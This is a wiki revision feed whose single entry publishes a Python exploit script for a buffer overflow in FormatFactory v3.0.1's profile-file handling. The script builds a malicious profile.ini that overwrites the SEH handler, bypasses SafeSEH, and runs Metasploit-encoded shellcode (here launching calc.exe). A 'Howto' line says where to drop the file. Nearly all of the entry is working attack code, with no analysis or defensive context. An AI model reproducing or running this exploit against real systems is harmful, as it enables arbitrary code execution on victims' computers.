<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FormatFactory_v3.0.1_Profile_File_Handling_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>FormatFactory v3.0.1 Profile File Handling 緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FormatFactory_v3.0.1_Profile_File_Handling_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FormatFactory_v3.0.1_Profile_File_Handling_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-17T02:55:40Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=FormatFactory_v3.0.1_Profile_File_Handling_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=726&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/python   # Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow # Version:       &lt;= 3.0.1 # Date:          2012-11-19 # Author:...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FormatFactory_v3.0.1_Profile_File_Handling_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=726&amp;oldid=prev"/>
		<updated>2021-03-27T03:37:05Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/python   # Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow # Version:       &amp;lt;= 3.0.1 # Date:          2012-11-19 # Author:...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
 &lt;br /&gt;
# Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow&lt;br /&gt;
# Version:       &amp;lt;= 3.0.1&lt;br /&gt;
# Date:          2012-11-19&lt;br /&gt;
# Author:        Julien Ahrens (@MrTuxracer)&lt;br /&gt;
# Homepage:      http://www.inshell.net&lt;br /&gt;
# Software Link: http://www.pcfreetime.com&lt;br /&gt;
# Tested on:     Windows XP SP3 Professional German&lt;br /&gt;
# Notes:         -&lt;br /&gt;
# Howto:         Copy .ini to %USERPROFILE%\My Documents\FormatFactory\PicCustom&lt;br /&gt;
&lt;br /&gt;
from struct import pack&lt;br /&gt;
&lt;br /&gt;
file=&amp;quot;profile.ini&amp;quot;&lt;br /&gt;
&lt;br /&gt;
junk1=&amp;quot;\xCC&amp;quot; * 260&lt;br /&gt;
nseh=&amp;quot;\xeb\x06\x90\x90&amp;quot;&lt;br /&gt;
eip=pack('&amp;lt;L',0x024C1923) # CALL DWORD PTR SS:[EBP-C] at 0x024c1923 - SafeSEH Bypass&lt;br /&gt;
nops=&amp;quot;\x90&amp;quot; * 10&lt;br /&gt;
junk2=&amp;quot;\xCC&amp;quot; * 10000&lt;br /&gt;
&lt;br /&gt;
# windows/exec CMD=calc.exe&lt;br /&gt;
# Encoder: x86/shikata_ga_nai&lt;br /&gt;
# powered by Metasploit&lt;br /&gt;
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00'&lt;br /&gt;
&lt;br /&gt;
shellcode = (&amp;quot;\xba\x68\x3e\x85\x1f\xd9\xca\xd9\x74\x24\xf4\x58\x29\xc9&amp;quot; +&lt;br /&gt;
&amp;quot;\xb1\x33\x31\x50\x12\x83\xe8\xfc\x03\x38\x30\x67\xea\x44&amp;quot; +&lt;br /&gt;
&amp;quot;\xa4\xee\x15\xb4\x35\x91\x9c\x51\x04\x83\xfb\x12\x35\x13&amp;quot; +&lt;br /&gt;
&amp;quot;\x8f\x76\xb6\xd8\xdd\x62\x4d\xac\xc9\x85\xe6\x1b\x2c\xa8&amp;quot; +&lt;br /&gt;
&amp;quot;\xf7\xad\xf0\x66\x3b\xaf\x8c\x74\x68\x0f\xac\xb7\x7d\x4e&amp;quot; +&lt;br /&gt;
&amp;quot;\xe9\xa5\x8e\x02\xa2\xa2\x3d\xb3\xc7\xf6\xfd\xb2\x07\x7d&amp;quot; +&lt;br /&gt;
&amp;quot;\xbd\xcc\x22\x41\x4a\x67\x2c\x91\xe3\xfc\x66\x09\x8f\x5b&amp;quot; +&lt;br /&gt;
&amp;quot;\x57\x28\x5c\xb8\xab\x63\xe9\x0b\x5f\x72\x3b\x42\xa0\x45&amp;quot; +&lt;br /&gt;
&amp;quot;\x03\x09\x9f\x6a\x8e\x53\xe7\x4c\x71\x26\x13\xaf\x0c\x31&amp;quot; +&lt;br /&gt;
&amp;quot;\xe0\xd2\xca\xb4\xf5\x74\x98\x6f\xde\x85\x4d\xe9\x95\x89&amp;quot; +&lt;br /&gt;
&amp;quot;\x3a\x7d\xf1\x8d\xbd\x52\x89\xa9\x36\x55\x5e\x38\x0c\x72&amp;quot; +&lt;br /&gt;
&amp;quot;\x7a\x61\xd6\x1b\xdb\xcf\xb9\x24\x3b\xb7\x66\x81\x37\x55&amp;quot; +&lt;br /&gt;
&amp;quot;\x72\xb3\x15\x33\x85\x31\x20\x7a\x85\x49\x2b\x2c\xee\x78&amp;quot; +&lt;br /&gt;
&amp;quot;\xa0\xa3\x69\x85\x63\x80\x86\xcf\x2e\xa0\x0e\x96\xba\xf1&amp;quot; +&lt;br /&gt;
&amp;quot;\x52\x29\x11\x35\x6b\xaa\x90\xc5\x88\xb2\xd0\xc0\xd5\x74&amp;quot; +&lt;br /&gt;
&amp;quot;\x08\xb8\x46\x11\x2e\x6f\x66\x30\x4d\xee\xf4\xd8\xbc\x95&amp;quot; +&lt;br /&gt;
&amp;quot;\x7c\x7a\xc1&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
poc=&amp;quot;Type=&amp;quot; + junk1 + nseh + eip + nops + shellcode + junk2&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
    print &amp;quot;[*] Creating exploit file...\n&amp;quot;;&lt;br /&gt;
    writeFile = open (file, &amp;quot;w&amp;quot;)&lt;br /&gt;
    writeFile.write( poc )&lt;br /&gt;
    writeFile.close()&lt;br /&gt;
    print &amp;quot;[*] File successfully created!&amp;quot;;&lt;br /&gt;
except:&lt;br /&gt;
    print &amp;quot;[!] Error while creating file!&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>